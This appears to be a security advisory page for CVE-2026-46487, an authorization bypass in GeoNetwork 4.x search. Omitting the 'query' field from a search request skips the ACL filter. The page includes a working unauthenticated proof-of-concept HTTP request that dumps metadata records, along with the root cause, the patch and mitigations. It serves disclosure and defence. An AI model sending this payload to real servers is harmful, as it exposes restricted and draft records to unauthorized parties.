CVE-2026-46487: GeoNetwork Elasticsearch Search ACL Bypass via Missing Query Field
An unauthenticated attacker can retrieve restricted metadata records from GeoNetwork by sending a search request that omits the query field, causing the access-control filter injection to be skipped e
The problem
GeoNetwork 4.x proxies all Elasticsearch search requests through a filter layer that injects group-based visibility rules, draft exclusions, ownership checks, and portal filters before forwarding to the index.
A logic flaw in that injection step means it only fires when the incoming JSON body contains a top-level `query` key. A body that omits `query` (for example, one containing only `size`, `_source`, or `aggs`) bypasses the check entirely. The raw request reaches Elasticsearch with no ACL constraints, exposing all indexed metadata including records limited to specific groups, draft records, and records that should be portal-scoped.
Proof of concept
A working proof-of-concept for CVE-2026-46487 in org.geonetwork-opensource:geonetwork, with the exact payload below.
POST /geonetwork/srv/api/search/records/_search HTTP/1.1
Host: <target>
Content-Type: application/json
{
"size": 100,
"_source": ["uuid", "resourceTitleObject", "groupOwner", "owner", "isPublishedToAll"],
"sort": [{"_score": "desc"}]
}The root cause is CWE-862 (Missing Authorization): the filter-injection code path is guarded by a condition that checks for the presence of a `query` node in the request body, so a body without that node skips the guard and forwards a completely unconstrained query to Elasticsearch.
The patch adds an unconditional ACL filter application step that runs regardless of whether a `query` field is present, ensuring the `bool` filter clauses (group visibility, draft status, ownership, portal scope) are always merged into the outgoing Elasticsearch request.
No public PoC has been published; this payload is derived directly from the advisory's stated trigger condition (omitting the `query` field) and the documented search endpoint behaviour.
The fix
Upgrade to GeoNetwork 4.4.11 or later (the first release containing the unconditional ACL filter guard). If an immediate upgrade is not possible, restrict unauthenticated access to `/srv/api/search/records/_search` and `/_msearch` at the reverse-proxy or WAF layer until the patch can be applied.
Related research
- highCVE-2026-47424CVE-2026-47424: OpenAM Authenticated Groovy Sandbox Escape to RCE
- highCVE-2026-46619CVE-2026-46619: OpenAM MSISDN Authentication Bypass via LDAP Injection
- highCVE-2026-46623CVE-2026-46623: OpenAM OAuth2 Module Account Takeover via Unverified Password Change
- high · 8.5CVE-2026-45048CVE-2026-45048: OpenAM Authenticated Privilege Escalation via Session RPC Token Disclosure